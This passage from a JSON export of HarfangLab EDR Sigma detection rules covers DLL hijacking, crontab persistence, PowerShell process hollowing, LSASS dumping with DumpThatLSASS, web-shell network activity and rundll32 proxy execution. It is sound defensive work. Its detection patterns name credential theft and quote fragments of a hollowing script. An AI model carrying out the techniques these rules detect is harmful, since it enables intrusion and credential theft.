'?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ae9fae6e-37ff-4753-b87f-5414d285d5ea",
"rule_name": "DLL Hijacking via netdom.exe",
"rule_description": "Detects potential Windows DLL Hijacking via netdom.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "af0bca45-967b-4f4e-9bec-257f493f23b7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608885Z",
"creation_date": "2026-03-23T11:45:34.608888Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608896Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1204/"
],
"name": "t1204_harfanglab_eicar.yml",
"content": "title: Harfanglab EICAR (Windows)\nid: af0bca45-967b-4f4e-9bec-257f493f23b7\ndescription: |\n This is a test rule that detects the string 'EICAR-STANDARD-HARFANGLAB-TEST-STRING' inside the command-line of a process.\n EICAR files are files that were originally used to test the response of computer AV programs. HarfangLab has used this concept to create a test rule for its EDR.\n This does not represent inherently malicious activity and there should be no need for investigation if these tests are expected in your environment.\n If this rule has triggered, it means that HarfangLab EDR detection engines are operating properly.\nreferences:\n - https://attack.mitre.org/techniques/T1204/\ndate: 2021/06/22\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Malware.EICAR\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains: 'EICAR-STANDARD-HARFANGLAB-TEST-STRING'\n condition: selection\nlevel: low\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "af0bca45-967b-4f4e-9bec-257f493f23b7",
"rule_name": "Harfanglab EICAR (Windows)",
"rule_description": "This is a test rule that detects the string 'EICAR-STANDARD-HARFANGLAB-TEST-STRING' inside the command-line of a process.\nEICAR files are files that were originally used to test the response of computer AV programs. HarfangLab has used this concept to create a test rule for its EDR.\nThis does not represent inherently malicious activity and there should be no need for investigation if these tests are expected in your environment.\nIf this rule has triggered, it means that HarfangLab EDR detection engines are operating properly.\n",
"rule_creation_date": "2021-06-22",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "af24b126-2721-4de0-82bf-9eda04d35316",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089264Z",
"creation_date": "2026-03-23T11:45:34.089266Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089270Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking",
"https://www.trellix.com/en-au/about/newsroom/stories/xdr/using-mitre-advance-trellix-products.html",
"https://attack.mitre.org/techniques/T1053/003/"
],
"name": "t1053_003_crontab_suspicious_execution_linux.yml",
"content": "title: Suspicious Crontab Execution (Linux)\nid: af24b126-2721-4de0-82bf-9eda04d35316\ndescription: |\n Detects a suspicious execution of the crontab command.\n Attackers can use crontab to add malicious cron jobs to establish persistence.\n It is recommended to investigate the parent process of crontab as well as the potential creation of cron jobs to determine whether this action was legitimate.\nreferences:\n - https://www.cadosecurity.com/blog/from-automation-to-exploitation-the-growing-misuse-of-selenium-grid-for-cryptomining-and-proxyjacking\n - https://www.trellix.com/en-au/about/newsroom/stories/xdr/using-mitre-advance-trellix-products.html\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2024/09/27\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.003\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Crontab\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection1:\n CommandLine: '*echo*|*crontab -'\n\n selection2:\n CommandLine: 'crontab -'\n\n filter_selection2:\n ParentImage:\n - '/bin/sh'\n - '/bin/bash'\n - '/bin/csh'\n - '/bin/dash'\n - '/bin/ksh'\n - '/bin/tcsh'\n - '/bin/zsh'\n - '/usr/bin/bash'\n - '/usr/bin/dash'\n\n exclusion_parent_selection1:\n ParentImage:\n - '/usr/sbin/veeamworker'\n - '/usr/sbin/veeamservice'\n\n exclusion_parent_selection2:\n ParentImage:\n - '/usr/sbin/veeamworker'\n - '/usr/sbin/veeamservice'\n\n exclusion_docker:\n Ancestors|contains:\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_puppet:\n ParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_nvidia:\n CommandLine|contains|all:\n - ' echo \"# NVIDIA SDK Manager updater'\n - 'updater.sh'\n ParentImage|endswith: 'sdkmanager-gui'\n\n exclusion_ibm:\n ParentImage: 
'/IBM/InformationServer/Server/DSEngine/bin/dsapi_slave'\n\n # https://catalyst.earth/tutorial/installing-catalyst-professional-on-linux/\n exclusion_catalyst:\n ParentImage: '/opt/catalystpro/exe/catalystpro.exe'\n\n condition: (selection1 or (selection2 and not filter_selection2)) and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "af24b126-2721-4de0-82bf-9eda04d35316",
"rule_name": "Suspicious Crontab Execution (Linux)",
"rule_description": "Detects a suspicious execution of the crontab command.\nAttackers can use crontab to add malicious cron jobs to establish persistence.\nIt is recommended to investigate the parent process of crontab as well as the potential creation of cron jobs to determine whether this action was legitimate.\n",
"rule_creation_date": "2024-09-27",
"rule_modified_date": "2025-01-31",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "af36e66f-17e7-4683-b412-ff4e992f0f4f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587151Z",
"creation_date": "2026-03-23T11:45:34.587155Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587162Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rmactivate_ssp_isv.yml",
"content": "title: DLL Hijacking via rmactivate_ssp_isv.exe\nid: af36e66f-17e7-4683-b412-ff4e992f0f4f\ndescription: |\n Detects potential Windows DLL Hijacking via rmactivate_ssp_isv.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rmactivate_ssp_isv.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\cryptsp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "af36e66f-17e7-4683-b412-ff4e992f0f4f",
"rule_name": "DLL Hijacking via rmactivate_ssp_isv.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rmactivate_ssp_isv.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "af55dc31-5d7c-4332-a872-fccbee512a84",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087162Z",
"creation_date": "2026-03-23T11:45:34.087164Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087169Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://gist.github.com/xenoscr/99370ecffb07f629ae74e7808cb91450",
"https://attack.mitre.org/techniques/T1055/012/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1055_powershell_process_hollowing.yml",
"content": "title: Process Hollowed via PowerShell\nid: af55dc31-5d7c-4332-a872-fccbee512a84\ndescription: |\n Detects suspicious PowerShell patterns from open-source PowerShell scripts used for Process Hollowing.\n Process Hollowing is a technique for injecting code into processes to evade defenses by avoiding to write a malicious binary to disk.\n It consists in creating a new process in a suspended state from a targeted legitimate process in order to unmap some or all of its memory, and replace it with malicious code.\n It is recommended to investigate this script and the parent processes of the PowerShell interpreter that executed it to determine if the process injection was successful and to search for any malicious activity.\nreferences:\n - https://gist.github.com/xenoscr/99370ecffb07f629ae74e7808cb91450\n - https://attack.mitre.org/techniques/T1055/012/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/04/18\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.t1106\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - attack.t1055.002\n - attack.t1055.003\n - attack.t1055.012\n - attack.t1055.013\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_base_cmdline:\n PowershellCommand|contains|all:\n - 'Start-Hollow'\n - '-Sponsor'\n - '-Hollow'\n\n # Auxiliary Function to Check PE target's architecture\n selection_pe_arch:\n PowershellCommand|contains|all:\n - '$BinPath = (Resolve-Path $Path -ErrorAction Stop).Path'\n - '$BinBytes = [System.IO.File]::ReadAllBytes($BinPath)'\n - \"[Int16]$PE = '0x{0}' -f ((($BinBytes[($PEOffset)..($PEOffset+1)]) | % {$_.ToString('X2')}) -join '')\"\n - 
\"[Int16]$PEArch = '0x{0}' -f ((($BinBytes[($OptOffset+1)..($OptOffset)]) | % {$_.ToString('X2')}) -join '')\"\n\n selection_get_pbi:\n PowershellCommand|contains|all:\n - '[UInt32]$RetLen = 0'\n - '$CallResult = [Hollow]::NtQueryInformationProcess($hProcess,0,[ref]$PROCESS_BASIC_INFORMATION,$PROCESS_BASIC_INFORMATION_Size, [ref]$RetLen)'\n\n selection_remote_params:\n PowershellCommand|contains:\n - 'WriteProcessMemory($hProcess,$pProcessParameters,$pProcessParameters,$ProcParamsLength,[ref]$BytesWritten)'\n - 'VirtualAllocEx($hProcess,$pProcessParameters,$ProcParamsLength,0x3000,0x4)'\n\n selection_strings:\n PowershellCommand|contains:\n - 'but really the user should drink more coffee'\n - 'Kind of whack but unsure how to translate properly'\n - '[+] Allocated memory in the Hollow'\n - 'Some proper ghetto PE parsing'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "af55dc31-5d7c-4332-a872-fccbee512a84",
"rule_name": "Process Hollowed via PowerShell",
"rule_description": "Detects suspicious PowerShell patterns from open-source PowerShell scripts used for Process Hollowing.\nProcess Hollowing is a technique for injecting code into processes to evade defenses by avoiding writing a malicious binary to disk.\nIt consists of creating a new process in a suspended state from a targeted legitimate process in order to unmap some or all of its memory and replace it with malicious code.\nIt is recommended to investigate this script and the parent processes of the PowerShell interpreter that executed it to determine if the process injection was successful and to search for any malicious activity.\n",
"rule_creation_date": "2024-04-18",
"rule_modified_date": "2025-01-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055",
"attack.t1055.002",
"attack.t1055.003",
"attack.t1055.012",
"attack.t1055.013",
"attack.t1059.001",
"attack.t1106"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "af913938-1bde-4c8e-ab59-8a1108c63563",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075329Z",
"creation_date": "2026-03-23T11:45:34.075333Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075338Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/D1rkMtr/DumpThatLSASS",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_file_dumpthatlsass.yml",
"content": "title: LSASS Memory Dumped via DumpThatLSASS\nid: af913938-1bde-4c8e-ab59-8a1108c63563\ndescription: |\n Detects a suspicious attempt to dump LSASS process memory using DumpThatLSASS tool.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n By default this tool dump LSASS into a file named c4dd2a46-ceeb-425d-8dcb-ae21b341ca45.tmp.\n It is recommended to analyze the process responsible for writing this file to disk, to look for other malicious actions on the host and to start memory forensics to determine stolen credentials.\nreferences:\n - https://github.com/D1rkMtr/DumpThatLSASS\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2022/10/27\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.Filesystem\n - classification.Windows.HackTool.DumpThatLSASS\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.LSASSAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith: '\\c4dd2a46-ceeb-425d-8dcb-ae21b341ca45.tmp'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "af913938-1bde-4c8e-ab59-8a1108c63563",
"rule_name": "LSASS Memory Dumped via DumpThatLSASS",
"rule_description": "Detects a suspicious attempt to dump LSASS process memory using the DumpThatLSASS tool.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nBy default, this tool dumps LSASS into a file named c4dd2a46-ceeb-425d-8dcb-ae21b341ca45.tmp.\nIt is recommended to analyze the process responsible for writing this file to disk, to look for other malicious actions on the host and to start memory forensics to determine stolen credentials.\n",
"rule_creation_date": "2022-10-27",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "afa806a4-ff77-4aad-81ce-cf445b4bd002",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087421Z",
"creation_date": "2026-03-23T11:45:34.087424Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087431Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/sensepost/reGeorg/tree/master",
"https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/",
"https://www.cert.ssi.gouv.fr/cti/CERTFR-2023-CTI-009/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1505_003_suspicious_network_connection_from_webserver_linux.yml",
"content": "title: Suspicious Network Activity from Web Server (Linux)\nid: afa806a4-ff77-4aad-81ce-cf445b4bd002\ndescription: |\n Detects suspicious network communications by a web server related to a possible web shell.\n Adversaries may backdoor web servers with web shells to establish persistent access to systems or to move laterally within a network.\n Tools like reGeorg can be used by attackers to pivot inside the compromised environment.\n It is recommended to verify the legitimacy of this network connection and check any other command executed by the web server.\nreferences:\n - https://github.com/sensepost/reGeorg/tree/master\n - https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/\n - https://www.cert.ssi.gouv.fr/cti/CERTFR-2023-CTI-009/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2023/10/27\nmodified: 2025/07/29\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.003\n - attack.lateral_movement\n - attack.t1021\n - classification.Linux.Source.NetworkActivity\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.Lateralization\n - classification.Linux.Behavior.RemoteShell\nlogsource:\n category: network_connection\n product: linux\ndetection:\n selection_dst_port:\n DestinationPort:\n - '22'\n - '445'\n - '3389'\n Initiated: 'true'\n\n selection_webserver_common:\n ProcessImage|endswith:\n - '/apache2'\n - '/httpd'\n - '/nginx'\n - '/php-fpm'\n # NOTE: On Ubuntu, php-fpm have its version as a suffix...\n - '*php-fpm*'\n\n selection_webserver_tomcat:\n # NOTE: Tomcat is executed via java and its main class is 'org.apache.catalina.startup.Bootstrap'\n ProcessParentImage|endswith: 'java'\n ProcessParentCommandLine|contains: 'org.apache.catalina.startup.Bootstrap'\n\n exclusion_loopback_connection:\n SourceIp:\n - '::1'\n - '::ffff:7f00:1'\n - '127.0.0.1'\n - '::ffff:127.0.0.1'\n DestinationIp:\n - '::1'\n - '127.0.0.1'\n - 
'::ffff:7f00:1'\n - '::ffff:127.0.0.1'\n\n condition: selection_dst_port and 1 of selection_webserver_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "afa806a4-ff77-4aad-81ce-cf445b4bd002",
"rule_name": "Suspicious Network Activity from Web Server (Linux)",
"rule_description": "Detects suspicious network communications by a web server related to a possible web shell.\nAdversaries may backdoor web servers with web shells to establish persistent access to systems or to move laterally within a network.\nTools like reGeorg can be used by attackers to pivot inside the compromised environment.\nIt is recommended to verify the legitimacy of this network connection and check any other command executed by the web server.\n",
"rule_creation_date": "2023-10-27",
"rule_modified_date": "2025-07-29",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1021",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "afbdfb71-0e3c-43c6-94dc-f175f223b21d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079744Z",
"creation_date": "2026-03-23T11:45:34.079746Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079751Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_rundll32_zipfldr_proxy_execution.yml",
"content": "title: Proxy Execution via zipfldr.dll\nid: afbdfb71-0e3c-43c6-94dc-f175f223b21d\ndescription: |\n Detects a suspicious invocation of zipfldr.dll by rundll32.\n Adversaries may abuse rundll32.exe to proxy execution of malicious code.\n Using rundll32.exe to execute malicious code indirectly (by calling zipfldr.dll's RouteTheCall function) may avoid detection by security tools. This is because some security solutions whitelist rundll32.exe as a legitimate Windows process or generate too many false positives from its normal baseline activity to effectively monitor it.\n It is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze its child processes.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2025/10/17\nmodified: 2025/10/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Zipfldr\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n ProcessParentOriginalFileName: 'rundll32.exe'\n ParentCommandLine|contains:\n - ' zipfldr,'\n - ' zipfldr.dll,'\n\n selection_function:\n ParentCommandLine|contains: 'RouteTheCall'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "afbdfb71-0e3c-43c6-94dc-f175f223b21d",
"rule_name": "Proxy Execution via zipfldr.dll",
"rule_description": "Detects a suspicious invocation of zipfldr.dll by rundll32.\nAdversaries may abuse rundll32.exe to proxy execution of malicious code.\nUsing rundll32.exe to execute malicious code indirectly (by calling zipfldr.dll's RouteTheCall function) may avoid detection by security tools. This is because some security solutions whitelist rundll32.exe as a legitimate Windows process or generate too many false positives from its normal baseline activity to effectively monitor it.\nIt is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze its child processes.\n",
"rule_creation_date": "2025-10-17",
"rule_modified_date": "2025-10-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1216.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "afc0aad4-2a07-40e8-bf67-4e0056e60353",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090461Z",
"creation_date": "2026-03-23T11:45:34.090463Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090467Z",
"rule_level": "high",
"rule_confidence": "strong",
